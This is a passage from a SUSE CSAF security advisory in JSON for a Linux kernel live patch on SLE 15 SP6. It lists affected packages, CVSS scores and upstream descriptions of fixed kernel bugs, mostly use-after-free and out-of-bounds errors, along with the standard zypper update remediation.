"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 10 for SUSE Linux Enterprise 15 SP6)",
"tracking": {
"current_release_date": "2026-03-26T12:33:43Z",
"generator": {
"date": "2026-03-26T12:33:43Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1073-1",
"initial_release_date": "2026-03-26T12:33:43Z",
"revision_history": [
{
"date": "2026-03-26T12:33:43Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_42-default-15-150600.2.3.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_50-default-13-150600.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
